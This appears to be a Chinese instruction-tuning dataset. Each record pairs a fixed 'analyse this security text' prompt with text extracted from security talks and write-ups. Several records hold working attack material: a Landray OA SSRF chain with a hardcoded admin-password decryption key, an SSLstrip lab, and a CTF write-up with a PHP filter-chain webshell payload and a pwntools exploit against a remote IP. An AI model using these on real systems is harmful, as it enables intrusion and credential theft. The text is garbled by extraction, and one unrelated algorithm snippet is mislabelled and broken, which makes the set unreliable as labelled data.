{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEtherSniff EtherSniff How to stealthily monitor an How to stealthily monitor an established Ethernet network established Ethernet network by Mark Smith, aka Smitty Introduction Introduction Hardwired network paths are secure. Hardwired network paths are secure. No encryption needed internally. No encryption needed internally. A physical A physical sniffer sniffer insertion would break link on insertion would break link on network interfaces, triggering alarms. network interfaces, triggering alarms. Right? Right?  maybe not maybe not  Introduction: Me Introduction: Me Mark Smith, aka Mark Smith, aka Smitty Smitty By day: Network engineer and system By day: Network engineer and system administrator for over 15 years administrator for over 15 years By night: Maker, ham radio nerd, musician, By night: Maker, ham radio nerd, musician, podcaster podcaster, husband, father, closet tree hugger , husband, father, closet tree hugger Contact me: Contact me: Email: mark {at} halibut {dot} com Email: mark {at} halibut {dot} com @ @SmittyHalibut SmittyHalibut just about everywhere else. just about everywhere else. Encoding Techniques: 10baseT Encoding Techniques: 10baseT 10Mbps, baseband (not carrier modulated), 10Mbps, baseband (not carrier modulated), Twisted pair. Twisted pair. 10Mbps data stream, Manchester coded, 10Mbps data stream, Manchester coded, produces 20MHz square wave signal. produces 20MHz square wave signal. Bi Bi--state output: +2.5v and state output: +2.5v and --2.5v. 2.5v. Full duplex done with two separate simplex Full duplex done with two separate simplex pairs: TX and RX pairs: TX and RX http://en.wikipedia.org/wiki/10BASET Encoding Techniques: 10baseT Encoding Techniques: 10baseT Manchester coding: Output = Data XOR Clock Manchester coding: Output = Data XOR Clock Guarantees a state transition with every bit. Guarantees a state transition with every bit. http://en.wikipedia.org/wiki/Manchester_code Encoding Techniques: 100baseT Encoding Techniques: 100baseT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n蓝凌OA前台SSRF漏洞 漏洞地址: /sys/ui/extend/varkind/custom.jsp 直接贴源码: <%@page import=\"com.landray.kmss.util.ResourceUtil\"%> <%@page import=\"net.sf.json.JSONArray\"%> <%@page import=\"net.sf.json.JSONObject\"%> <%@ page language=\"java\" pageEncoding=\"UTF-8\"%> <%@ taglib prefix=\"c\" uri=\"http://java.sun.com/jsp/jstl/core\"%> <% JSONObject vara = JSONObject.fromObject(request.getParameter(\"var\")); JSONObject body = JSONObject.fromObject(vara.get(\"body\")); %> <c:import url='<%=body.getString(\"file\") %>'> <c:param name=\"var\" value=\"${ param['var'] }\"></c:param> </c:import> 挺简单的处漏洞 内容就是堆套娃处理不细说 问题就是在于 <c:import url= <c:import>标签提供了所有<jsp:include>为标签所具有的功能同时也允许 包含绝对URL 举例来说使<c:import>标签可以包含个FTP服务器中不同的内容 url的内容可控为json内容中的file键值 这的url可以是相对路径和绝对路径或者是其他主机的资源 简单来说就是处ssrf并且是有回显的 看了部分poc都是利file协议去读取passwd 你以为章到这就结束了这才刚刚开始 既然是SSRF并且可以读件还持相对路径这不好好利下 如果你看过蓝凌OA的配置档你就知道admin.do这个路径是管理系统配置并 且该地址的密码是以硬编码的格式保存在本地的 路径: WEB-INF/KmssConfig/admin.properties 既然上的ssrf持相对路径和绝对路径并且是有回显的那么只需要读取这 个路径的件就可以了 成功得到密码但是这要注意 kmss.properties.encrypt.enabled = true 如果为ture则说明password的内容是加密过的 那么就需要进步解密 先看看这个件在哪被读取了 在 com.landray.kmss.sys.config.constant.SysConfigConstant 类 中 admin.properties 的路径被存储在变量 ADMIN_PROPERTIES_PATH 中 继续查找看下哪调了 ADMIN_PROPERTIES_PATH 变量 最终在 com.landray.kmss.sys.config.action.SysConfigAdminUtil 中发现 getAdminProperties 法中存在调 看了下具体逻辑 if (isEncryptEnabled(p)) if (isEncryptEnabled(p)) p.setProperty(\"password\", doPasswordDecrypt( p.getProperty(\"password\"))); return p; } 如果配置件中的加密选项为true则进 doPasswordDecrypt 法进解密 这不就直接可以了吗 解密代码: import com.landray.kmss.util.DESEncrypt; public class main { public static void main(String[] args) { String password = \"mqwEyqHLj9PQXpy+yhf4z92SejWx+VeS\"; String resul=doPasswordDecrypt(password); System.out.println(resul); } public static String doPasswordDecrypt(String password) { try { DESEncrypt des = new DESEncrypt(\"kmssAdminKey\"); return des.decryptString(password); } catch (Exception ex) { try { DESEncrypt des0 = new DESEncrypt(\"kmssAdminKey\", true); return des0.decryptString", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n简单规则屏蔽goby和masscan 0x00 前 和橙酱讨论了下扫描特征的问题橙酱提到masscan有固定特征可以被识别因此记录 下 0x01 扫描特征 根据章描述 意思概是nmap的tcp-option字段为4个字节这是个特征因此可以使IP上图的 iptables规则直接把nmap的端扫描流量给丢弃掉对应到wireshark抓包来看是这个字段 这是个nmap的sT扫描的抓包实例在tcp option这个字段是24字节和前说的有所不同经 过抓包来看正常的tcp请求这个tcp option也是24字节为多因此这个特征并不存在于nmap的新版 之中 0x02 masscan的特征 上抓包看的是新版本的nmap但是历史章既然有了那么可以猜测到这个特征是历史版本的 nmap所具备的引申开来的话masscan是否具备该特征 橙酱抓包看了后发现确实masscan的新版本也具备这个特征我们来看看抓包截图 对应到同个字段masscan确实是4字节因此这个特征对masscan是适的 较有趣的是我做测试的时候的是goby因为goby在端扫描的时候是调的masscan因此 goby也受到这个特征的影响 换句话说只要我把iptables的规则配goby就再也扫不到我的端了 0x03 如何修改特征 为了修改这个特征我们需要去下载masscan的源码 想要快速定位到代码我们看下搜索特征 我在github直接搜索1460看看 很显然看到了摸样的特征字段在 /src/templ-pkt.c 这猜测是使这个默认的tcp模版来成的tcp请求因此在最后的options改下改成和正常 请求的options样即可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 22, Las Vegas 2014 Abusing Software Defined Networks Gregory Pickett, CISSP, GCIA, GPEN Chicago, Illinois gregory.pickett@hellfiresecurity.com Hellfire Security Overview What is it? Exploiting it! Fixing it! Moving Forward Wrapping Up Modern Day Networks Vendor Dependent Difficult to scale Complex and Prone to Break Distributed and Often Inconsistent Configuration Uses inflexible and difficult to innovate protocols Unable to Consider Other Factors  And Good Luck If You Want To Change It! Enter  Software Defined Networking Separate the Control and Data Plane Forwarding Decisions Made By a Controller Routers and Switches Just Forward Packets Controllers Programmed with the Intelligence Full visibility of the Network Can consider the totality of the network before making any decision Enforce Granular Policy Enter  Software Defined Networking Switches Bare-Metal Only Any Vendor  Hardware or Software Solves Lots of Problems Know the State of the Network Rather Than Inferring It Run Development and Production Side-By-Side More Practical  Solves Lots of Problems Less Expensive Hardware BGP Maintenance Dry-Out Customer Egress Selection Better BGP Security Faster Convergence Granular Peering at IXPs Solves Lots of Problems Real-World Network Slicing of Flow Space Network and Server Load Balancing Security Dynamic Access Control Adaptive Traffic Monitoring Attack Detection and Mitigation Emerging Standards Old and Busted SNMP BGP Netconf LISP PCEP New Hotness OVSDB Openflow Introducing Openflow Purpose Execute Logic At the Controller Update Forwarding Tables Defined Forwarding Process Messaging Format Introducing Openflow Elements Controller Secure Channel Forwarding Element Process Check Flow Table If Match Found, Execute Action If No Match, Send Packet to controller Update Flow Table Introducing Openflow Features Flow Tables Match/Action Entries Packet header matched against 1 of N tables 12 fields available for matching Wildcard matching available Actions Forward Dr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n如何有效突破 DevOps转型的临界点 张 乐 高效运维社区 合伙人 前百度资深敏捷/DevOps专家 自我介绍 张 乐  高效运维社区合伙人DevOps时代联合创始人  前百度资深敏捷教练DevOps专家  国内首批 Certified DevOps Master  DevOps Master 授权讲师凤凰项目沙盘授权教练  全球TOP外企国内一线互联网  百度云百度金融等新技术产品敏捷转型主导者  DevOpsDays 大会GOPS全球运维大会金牌讲师 DevOps 已成为发展趋势 IT 的技术革新 推进 DevOps 转型过程中经常遇到的问题  为什么需要DevOps转型  如何明确阐述转型的价值 转型启动 方案设计 项目试点 整体推广  采购和引入工具是否足够  DevOps体系非常庞大实施 难度较大应该从何处做起  项目紧急没空做转型  转型过程中团队成员不支持  转型初期效果不明显怎么办  效率提升了质量却下降了  试点成果规模化的路径  推广的组织结构是怎样的 鸟飞派 VS 空气动力学派 应用底层规律理解问题实质并解决问题 查理  芒格 如果你只是孤立地记住一些事物试 图把它们硬凑起来那你无法真正理解 任何事情你必须依靠模型组成的框 架来安排你的经验 进化论 概率论 复利效应 黄金思维圈 安全空间 系统思考 二八法则 约束理论 临界 知识 为什么需要DevOps 转型 进化论 想要在变化的世界里生存得更好你得在环境发生变化的时候快速响应  传统的软件工程方法 - 系统的应用工程方法 - 基于预测性 - 重管控结构化 - 有时避免或拒绝合理变更 图片来源 DevOps is not enough  @ufried  新的方法应对VUCA挑战 - 面向业务目标 - 助力业务成功 - 快速交付价值 - 灵活响应变化 we$didnt$do$anything$wrong,$ but$somehow,$we$lost 如何明确阐述转型的价值 DevOps 需要面向业务目标助力业务成功 采购和引入工具是否足够 系统思考 系统不是简单的因果关系而是回路网状关系 进行更深入的系统思考需要从系统的互动关系入手 DevOps 道法术器 A 道 A H 法 HH A 术 器 E & 实 现 I T 服 务 的 供 应 链  快 速  高 质 量 交 付 业 务 价 值 有 效 应 对 V U C A 挑 战  让 I T 成 为 业 务 发 展 的 竞 争 优 势 Reference Patrick DeboisDevops Areas - Codifying devops practices  Automation: Extend delivery to Production (IaC)  Measurement:$ Extend Operations feedback to Project (Metrics)  Culture :$ Embedded$Project knowledges into$Operations (Dev wear pagers, Co-responsible)  Sharing:$ Embedded$Operations$knowledge into$Projects (Monitoring, security stories into project backlog) DevOps 之道 快速交付价值灵活响应变化 Reference DevOps Master Whitepaper: Success$with$Enterprise$DevOps$ Reference KK Why, What, and How of Continuous Delivery  DevOps 之法 全局打通&捷开发 & 高效运维 DevOps 之术 系统应用指导原则  最佳实践                DevOps 之术 持续交付框架 Continuous$Delivery$is$the$ability$to$get$changes$of$all$typesincluding$new$features,$configuration$changes,$bug$fixes$ and$experimentsinto$production,$or$into$the$hands$of$users, safely and quickly in$a sustainable way. --Jez Humble 张乐 乐神 @ 高效运维社区 发布频率 分支模型 测试 架构 发布 基础设施 数据库 每100天发布一次 每10天发布一次 每天发布 每天发布10次 每天发布100次 主干开发 为发布创建分支 在主干开发 从主干发布 拉动提交 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nintigriti-0422-XSS-Challenge-Write-up 1 intigriti-0422-XSS-Challenge- Write-up 前 intigriti新出的challenge猜到是原型链污染的题但是许多点因为菜没有反应过 来同时学到了点新知识应各位师傅要求分享下 不了解JavaScript原型链污染攻击的可以先去P师傅博客预习下 https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html 原题地址 https://challenge-0422.intigriti.io/ 解题思路 题主体 function main() { const qs = m.parseQueryString(location.search) let appConfig = Object.create(null) appConfig[\"version\"] = 1337 appConfig[\"mode\"] = \"production\" appConfig[\"window-name\"] = \"Window\" appConfig[\"window-content\"] = \"default content\" appConfig[\"window-toolbar\"] = [\"close\"] appConfig[\"window-statusbar\"] = false appConfig[\"customMode\"] = false if (qs.config) { merge(appConfig, qs.config) appConfig[\"customMode\"] = true } let devSettings = Object.create(null) devSettings[\"root\"] = document.createElement('main') devSettings[\"isDebug\"] = false devSettings[\"location\"] = 'challenge-0422.intigriti.io' devSettings[\"isTestHostOrPort\"] = false if (checkHost()) { intigriti-0422-XSS-Challenge-Write-up 2 devSettings[\"isTestHostOrPort\"] = true merge(devSettings, qs.settings) } if (devSettings[\"isTestHostOrPort\"] || devSettings[\"isDebug\"]) { console.log('appConfig', appConfig) console.log('devSettings', devSettings) } if (!appConfig[\"customMode\"]) { m.mount(devSettings.root, App) } else { m.mount(devSettings.root, {view: function() { return m(CustomizedApp, { name: appConfig[\"window-name\"], content: appConfig[\"window-content\"] , options: appConfig[\"window-toolbar\"], status: appConfig[\"window-statusbar\"] }) }}) } document.body.appendChild(devSettings.root) } function checkHost() { const temp = location.host.split(':') const hostname = temp[0] const port = Number(temp[1]) || 443 return hostname === 'localhost' || port === 8080 } function isPrimitive(n) { return n === null || n === undefined || typeof n === 'string' || typeof n === 'boolea n' || typeof n === 'number' } function merge(target, source) { let protectedKeys = ['__proto__', \"mode\", \"version\", \"location\", ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbout  阿里巴巴移动安全专家  曾发现谷歌苹果等众多国 内外知名公司漏洞  擅长windows安全 andrdoid安全漏洞挖掘  支付宝钱包终端攻防对抗组 的负责人  客户端技术专家  主要移动端逆向漏洞挖掘 防护 dragonltx 曲和 Alipay.unLimit.Security.Team 1 第三方库安全现状 2 攻击Android第三方库 3 Fuzz*Android第三方库 4 第三方库安全思考 5 Q&A Agenda Part. 01 第三方库安全现状 3 探索切攻破切 | [ Hacker@KCon ] 探索切攻破切 | [ Hacker@KCon ] 探索切攻破切 | [ Hacker@KCon ] Part. 02 攻击Android第三方库 7 2 zxing 二维码解析库 几乎所有App都有扫码功能攻击范围大 2 zxing sqlcipher 第三方透明加密数据库组件 sqlcipher编译时没移除load* extension sql注入配合load_extension进行漏洞利用 sqlcipher 远程代码执行 黑客可将文件通过目录遍历漏洞放到app私有目录下 通过发消息触发sql注入语句 存在漏洞的app可以接收文件 攻击思路最早由TSRC白帽子雪人提出 chromium 国内很多Android浏览器都使用这个内核进行二次开发 最新的Android系统webview使用该引擎 历史漏洞众多(uxss,overflow,use* after*free,address*bar*spoof*etc.) chromium chromium 530301/531891影响众多国内浏览器 chromium 530301/531891影响国内众多Android5.0系统webview/系统自带浏览器 stagefright Android多媒体解析库 许多Android* App也会使用stagefright作为多媒体解析库 可通过彩信视频浏览等进行攻击 stagefright 2 libupnp 局域网内便捷播放UPnP架构库 开放了UDP 1900端口可远程攻击 2 libupnp 2 ffmpeg 采集功能视频格式转换视频抓图给视频加水印等 越来越多的应用使用ffmpeg库 2 ffmpeg 2 ffmpeg*CVE-2016-6920*0day 2 sdk安全 so可被劫持 so自身设计安全 Part. 03 Fuzz*Android第三方库 25 Fuzz**tools Peach MFFA honggfuzz AFL Peach*fuzz教程 http://www.peachfuzzer.com https://github.com/fuzzing/MFFA https://github.com/google/honggfuzz http://lcamtuf.coredump.cx/afl/ http://bbs.pediy.com/showthread.php?t=176420 Android Fuzz 基于文件格式规范 样本大小无限制 无需基于文件格式规范 代码路径反馈 小样本 Peach Honggfuzz AFL 无需基于文件格式规范 代码路径反馈 小样本 MFFA + Peach MFFA传输样本到手机 基于peach.pit生成样本 MFFA调起目标并监控崩溃 Peach MFFA 案例360影视 fuzz 案例360影视 fuzz 案例360影视 fuzz 案例skia fuzz 9-patch*(also*known*as*NinePatch)* is*an*Android-specific*extension*to the*PNG*image*format*that*allows* for*automatic*scaling*of*images 案例skia fuzz 案例skia fuzzCVE-2015-1532 Reproduce 案例stagefright fuzz build the module push the module run the module frameworks/av/cmds/stagefright mma /data/local/tmp/ ./stagefright a ./stagefright -s 案例stagefright fuzz(CVE-2015-6599) 案例stagefright fuzz(CVE-2015-6599) AFL + Peach + MFFA AFL Peach Create.sample. file.based.on. afl.corrupted. file Run. stagefright. wit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpread Spectrum Satcom Hacking Attacking the Globalstar Simplex Data Service Colby Moore @colbymoore - colby@synack.com Motivation  Satellite hacking talks never deliver  RF world largely neglected by hacker community  So much legacy tech in critical systems  Spark interest in satellite security research What are we going to learn?  Overview of basic RF signals and modulation  What is spread spectrum - how does it work and how do we work with it  Picking a target and reverse engineering it  Exploiting that target  Next steps Analog RF Modulation  Amplitude Modulation (AM)  Frequency Modulation (FM) Digital RF Modulation  Amplitude Shift Keying (ASK / OOK)  Frequency Shift Keying (FSK)  Phase Shift Keying (PSK) Spread Spectrum Modulation  What is Spread Spectrum Special? WiFi, Bluetooth, Most modern RF Communication Spread Spectrum Modulation  Frequency Hopping Spread Spectrum (FHSS)  Direct Sequence Spread Spectrum (DSSS) Selecting a Target  Consumer Accessible  Cheap  Popular  High Impact Introducing SPOT  SPOT  But wait this tech is used everywhere. Goldmine. Who uses it?  Flight Planning Services  Consumers  SCADA  Big Gas and Oil How does it work?  LEO non-geosynchronous Bend Pipe Architecture Intel Gathering  Google  FCC Database  Academic Papers  Integrator Spec Sheets Intel Gathering Continued  What we know:  PN = 255 Chip M-Sequence  1.6xx ghz  144 bit message Hardware and Validation  USRP B200  GQRX  GNURADIO Decoding Theory  Mix signal with PN sequence and the BPSK signal will drop out Packet Format Contd.  Wait a second There is no signing No encryption.  We can create packets if we known how to reproduce the checksum.  Reverse engineering the checksum Transmitting  Strictly Theoretical - Do not attempt  This is the easy part Impact of Transmission  Spoof communications  Disrupt critical services Signal Interception Demo  DEMO Future Research  Code optimization  Custom hardware  Widespread reception Slides and Code  Updated slides, resources, and code to ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSSLstrip  hijacking SSH Sessions Bowne Page 1 of 5 What You Need for This Project  A computer running Linux to be the Attacker (I wrote the instructions on a Ubuntu 8.04 virtual machine).  A second computer running any OS to be the Target. I used my Windows 7 host machine as the target. Goal The Attacker will serve as a proxy, converting secure HTTPS sessions to insecure HTTP ones. This will not be obvious to the user. Starting the Target Machine 1. Start your Target machine. 2. Open a browser on your Target machine and make sure you can connect to the Internet. Opening Facebook on the Target Machine 3. On your Target machine, in Firefox, go to facebook.com. Notice that this page is not securethe URL starts with http instead of https, as shown below on this page. 4. On your Target machine, in Firefox, click View, \"Page Source\". In the \"Source of http://www.facebook.com\" window, click Edit, Find. In the Find: box at the bottom of the window, type login and click the Next button. 5. You can see the form statement for the login form. This shows that although the page is not secure, the actual login method uses a URL starting with https. Many Websites use this system: a single page has both secure and insecure items. That is the vulnerability we will exploit. SSLstrip  hijacking SSH Sessions Bowne Page 2 of 5 Starting the Attacker Machine 6. Start an Ubuntu 8.04 virtual machine. That will be your Attacker machine. 7. Open a browser on your Attacker machine and make sure you can connect to the Internet. Downloading SSLstrip 8. On the Attacker Linux machine, open Firefox and go to this URL: thoughtcrime.org 9. Click Software. On the next page, click sslstrip. In the Download section, Click sslstrip. At the time I wrote this (Mar. 4, 2009), it was at version 0.2. 10. Save the file on your desktop. 11. On your desktop, right-click the sslstrip-0.2.tar.gz file and click \"Extract Here\". 12. On your desktop, double-click the sslstrip-0.2 folder to open it. 13. Right-click READ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHurley, Burish & Stanton, S.C. SECRET TOOLS Learning About Government Surveillance Software You Cant Ever See Peyton Foofus Engel DEF CON 25 Hurley, Burish & Stanton, S.C. Non-Public Technology  Breath analyzers: source code analysis reveals bugs  These are used for deciding whether to arrest and charge people.  https://arstechnica.com/tech-policy/2009/05/buggy-breathalyzer-code- reflects-importance-of-source-review/  https://www.wired.com/2009/05/minnesota-court-release-source-code-of- breath-testing-machines/  The Clipper Chip: the NSA-designed encryption device with a built-in back door  https://en.wikipedia.org/wiki/Clipper_chip  Trust us: we know what were doing Hurley, Burish & Stanton, S.C. Surveillance Is Pervasive  CALEA  Restrictions on installing un-tappable phone systems  https://en.wikipedia.org/wiki/Communications_Assistance_for_Law_E nforcement_Act  NSA Call Metadata Collection  Traffic analysis can be just as useful as content analysis  Surveillance is secret, also: most people didnt find out about the extent of surveillance until Snowden told us  http://www.npr.org/sections/thetwo-way/2015/11/29/457779757/nsa- ends-sept-11th-era-surveillance-program Hurley, Burish & Stanton, S.C. More Than Just Surveillance  Some of the Playpen cases have been dropped over the use of a NIT  FBI implants malware on a website that it seized in order to obtain IP addresses of TOR users  https://arstechnica.com/tech-policy/2017/03/doj-drops-case- against-child-porn-suspect-rather-than-disclose-fbi-hack/  Government exploit code leaks  https://www.theregister.co.uk/2017/03/08/cia_exploit_list_in_fu ll/  Where is the boundary between aggressive investigation and violating rights? Hurley, Burish & Stanton, S.C. Investigating Peer-to-Peer Networks  Gnutella, BitTorrent, Ares, etc.  These have been around for a while (the Gnutella variant has been in use since 2009)  Forks of open-source software  Make use of under-the-hood aspects of the peer-to- peer protocol that arent us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[SensePost  2009] Click to edit Master subtitle style 8/21/09 Clobbering the Cloud! { haroon | marco | nick } @sensepost.com [SensePost  2009] 8/21/09 about: us {Nicholas Arvanitis | Marco Slaviero | Haroon Meer} [SensePost  2009] 8/21/09 Why this talk ? [SensePost  2009] 8/21/09 This is not the time to split hairs [SensePost  2009] 8/21/09 The LOUD in cLOUD security..  A bunch of people are talking about the cloud  There are large numbers of people who are immediately down on it:  There is nothing new here  Same old, Same old  If we stand around splitting hairs, we risk missing something important.. [SensePost  2009] 8/21/09 So, what exactly *is* the Cloud? [SensePost  2009] 8/21/09 Cloud delivery models [SensePost  2009] 8/21/09 [SensePost  2009] 8/21/09 Why would we want to break it?  It will be where the action is..  Insidious the dark side is..  Amazingly we are making some of the same old mistakes all over again  We really dont have to.. [SensePost  2009] 8/21/09 What is driving Cloud adoption?  Management by in-flight magazine  Manager Version  Geek Version  Poor history from IT  Economy is down  Cost saving becomes more attractive  Cloud computing allows you to move from CAPEX to OPEX  (Private Clouds?) [SensePost  2009] 8/21/09 A really attractive option  EC2 is Cool!  Like Crack.. [SensePost  2009] 8/21/09 Problems testing the Cloud [SensePost  2009] 8/21/09 Transparency [SensePost  2009] 8/21/09 Compliance in the Cloud If its non-regulated data, go ahead and explore. If it is regulated, hold on. I have not run across anyone comfortable putting sensitive/regulated data in the cloud doesnt seem to be there as far as comfort level that security and audit aspects of that will stand up to scrutiny (sic) --Tim Mather: RSA Security Strategist [SensePost  2009] 8/21/09 Privacy and legal issues [SensePost  2009] 8/21/09 Privacy  Jim Dempsey (Center for Democracy and Technology): Loss of 4th Amendment protection for US companies  A legal order (court) to serve data", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 57.1 和为 S 的两个数字 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/390da4f7a00f44bea7c2f3d19491311b?tpId=13&tqId=11195&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 在有序数组中找出两个数使得和为给定的数 S如果有多对数字的和等于 S输出两个数的乘积最小的 ## 解题思路 使用双指针一个指针指向元素较小的值一个指针指向元素较大的值指向较小元素的指针从头向尾遍历指向较大元素的指针从尾向头遍历 - 如果两个指针指向元素的和 sum == target那么这两个元素即为所求 - 如果 sum \\> target移动较大的元素使 sum 变小一些 - 如果 sum \\< target移动较小的元素使 sum 变大一些 ```java public ArrayList<Integer> FindNumbersWithSum(int[] nums, int target) { int i = 0, j = nums.length - 1; while (i < j) { int cur = nums[i] + array[j]; if (cur == target) return new ArrayList<>(Arrays.asList(nums[i], nums[j])); if (cur < target) i++; else j--; } return new ArrayList<>(); } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKubernetes集群渗透 攻击者视角中的Kubernetes Zhaoyan Xu 资深研究工程师 Palo Alto Networks 2019年5月29日 Tongbo Luo 首席AI安全科学家 JD.com 日程 背景 Kubernetes的安全特性 攻击方式 横向运动实践 答疑 背景 Kubernetes在全球范围内广受欢迎  所有主流云提供商都提供K8S集群服务如AKS / EKS / GKE等  根据iDatalabs[1] 的报告大约有3,804家公司使用K8进行Web应用程序部署  年度用户增长率超过150 K8的安全性如何  K8S是否容易受到传统攻击  什么是K8S群集的新攻击方式  如何在K8S集群上进行渗透测试 容器化微服务要点 Service Mesh 层 Istio Linkerd Orchestrator 层 K8S Openshift 容器应用层 Docker Kata Container Rkt K8S要点 服务端组件: api-server: central server Controller-manger Scheduler Authentication/Authorization/Admission Control etcd: kv store 客户端组件: kubelet在每个主机/虚拟主机上安装 kubeproxy流量管理/重定向 K8S世界的术语 Pod服务计划的最小单位包含一个或多个容器 Deployment-部署捆绑一个Web应用程序例如将dbfrontend和backend服务器组合在一起 Service-服务用于公开Web应用程序的界面 Service Account-服务帐户K8S中的用户帐户 角色/角色绑定 Role/ RolebindingK8S中基于角色的访问控制 日程 背景 Kubernetes安全特性 攻击方式 横向运动实践 答疑 K8S安全功能概述v1.12.7 隔离 Pod级隔离 名称空间隔离的网络安全策略 认证 所有流量的HTTP 令牌客户端证书第三方身份验证 授权 基于角色的访问控制 准入控制用于pod部署等 预制的管理控制 Pod安全政策 Pod 安全策略 继续 K8S内置安全功能图示创建Pod 日程 背景 Kubernetes安全特性 攻击方式 横向运动实践 答疑 隔离躲避 网络扫描 问题网络隔离通常是通过容器网络接口CNI强制执行的第三方插件 但是大多数第三 方插件都存在漏洞有些插件无法实施网络安全策略 CNI 插件 网络模型 支持网络策略 通讯加密 Calico Layer 3 支持 加密 Canal Layer2, vxlan 支持 非加密 Flannel Layer2, vxlan 不支持 非加密 Kopeio Layer2, vxlan 不支持 非加密 Kube-router Layer2, vxlan 支持 非加密 隔离躲避 (续) 网络扫描 问题K8S在命名空间kube-system中有默认服务pod默认情况下群集中的任何pod都可以 访问这些服务  CVE示例kube-dns podCVE-2017-14491 问题api-server可以通过端口6443上的任何pod访问如果api-server允许匿名访问它会泄 漏您的群集信息  CVE示例CVE-2018-1002105 RBAC 躲避 认证绕过 问题某些CNI插件不会加密流量因此如果api-server不使用HTTP则令牌可能被盗 问题如果撤消角色则不会自动终止关联的窗格 所以它仍然具有被撤销角色的特权 认证滥用 问题隐式访问流程 有多种方法可以访问相同的资源 示例 kubectl create clusterrole secretadmin --verb=get --verb=list -- verb=create --verb=update --resource=secret 如果你没有密码管理权限你就无法运行 kubectl get secret以获取secret 但是如果您有权创建pod 通过一个新的 Pod 嵌入密码 可能的修复措施定义 PodSecruityPolicy并定义不 允许嵌入密码 RBAC 躲避 (续) 隐性权限提升 问题Pod可以通过关联其他服务帐户来升级其权限 用户与服务帐户sa1相关联, 但是他可以使用另一个服务帐户sa2创建一个pod 特权提升 问题K8S允许pod映射主机路径例如/tmp/, /var/log 特别是如果使用子路径装入卷它会将原始主机文件映射到pod的命名空间 漏洞CVE-2017-1002101 日程 背景 Kubernetes安全特性 攻击方式 横向运动实践 答疑 K8S的渗透攻击 问从攻击者的角度来看如何针对K8S群", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass firewalls, application white lists, secure remote desktops in 20 seconds Zoltan Balazs DEF CON 22, 2014 Hungary root@bt:~# whoami Zoltán Balázs root@bt:~# whoami root@bt:~# whoami AV testing AV bypass root@bt:~# whoami OSCP: Occasional Satire Captain Punk CISSP: Certified Interspecie-ial Sheep Shearing Professional CPTS: Certified Pajama Toaster Specialist MCP: Microsoft Certified Psychopath OSWP: Official Sexiest Weasel Popstar CHFI: Chronic Hopeless Flux Incompetent Im NOT a CEH CyberLympics@2012 CTF 2nd runners up  gula.sh Creator of the Zombie Browser Toolkit https://github.com/Z6543/ZombieBrowserPack I love hacking How do you hack high security systems? How do you hack high security systems when you are not Tom Cruise? The mission Im a spy I want access to a hardened secure RDP (remote desktop) server E.g. server contains confidential documents I need persistent C&C access to the RDP server To upload/download files Interactive remote code execution The solution (in an ideal world) Infected workstation Secure remote desktop server 1. Infect clients desktop 2. Steal RDP password 3. Connect to RDP 4. Drop malware 5. Command and Control 6. Profit The challenges RDP server is not reachable from the Internet Directly  Two factor authentication is used to access the RDP server No access to the token seeds ;) Drive mapping disabled  no direct file copy Restricted hardware firewall Allows workstation -> server TCP port 3389 IPv4 only Application white list is used on the RDP server M$ Applocker in my case with default policy Firewall, port 3389 allowed only Is this realistic? Similar environment at a client Had no time to hack it Infected workstation Secure remote desktop server Target Company The Internet Attacker Firewall, port 3389 allowed only In hacking, there is no such thing as impossible. Only things that are more challenging. Already achieved I have remote code execution with C&C on a users workstation I have access to a test RDP server, and I know how t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n护网杯WP-Nu1L 护网杯WP-Nu1L WEB 签到 SQLManager SimpleCalculator easyphp Pwn logger Crypto Signsystem 2EM Re gocrypt WEB 签到 js里有 SQLManager 原题https://www.anquanke.com/post/id/200927#h3-6 SimpleCalculator 国赛原题 easyphp 读源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php绕过死亡 die写入aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B然后包含 page=php://filter/read=convert.base64- decode/resource=sandbox/xxxxxxxx/aPD9waHAgZXZhbCgkX1BPU1RbY10pOz8%2B Pwn logger ?search=${~%A0%B8%BA%AB}[1](${~%A0%B8%BA%AB}[2])&1=phpinfo&2=0 from pwn import * # context.log_level = 'debug' # p = process('./logger') p = remote('39.105.35.195', 15333) def launch_gdb(): context.terminal = ['xfce4-terminal', '-x', 'sh', '-c'] gdb.attach(proc.pidof(p)[0]) def once(i,c): p.recvuntil('Exit') p.sendline('2') p.recvuntil('Content:') p.send(c + '\\x00') p.recvuntil('ID:') p.sendline(str(i)) def pwarn(c): p.recvuntil('Exit') p.sendline('1') p.recvuntil('Content:') p.send(c) def write_addr(addr,value): base = 0x67F7B0 for i in xrange(len(value)): # if ord(value[i]) == 0: continue once(addr - base + i,'a' * ord(value[i])) write_addr(0x67E020,p64(0x067F7A0)) pwarn('aa') 